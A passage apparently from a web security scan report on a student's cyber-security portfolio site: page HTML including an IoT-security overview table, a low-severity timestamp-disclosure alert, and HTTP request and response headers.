          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
           <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
           <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
           <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
           </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
           <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          998027574
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        13. GET https://beekmans.dev/
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          000613396, which evaluates to: 1970-01-08 03:23:16

          Request
          Request line and header section (224 bytes)
          GET https://beekmans.dev/ HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1039 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O9CfHQgObVNEaGCeR54qKKwytECMmlM5H0bXWDqJpVGo4vNUT18M2ld9NoeIDxTsPe1bzHv%2F9eh3xB7p6KNQNXYdikH5v2vQoVZ4Lqr2%2BgmRM8bXQ1W95L9VnzmijHE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a326098f0c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178339 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
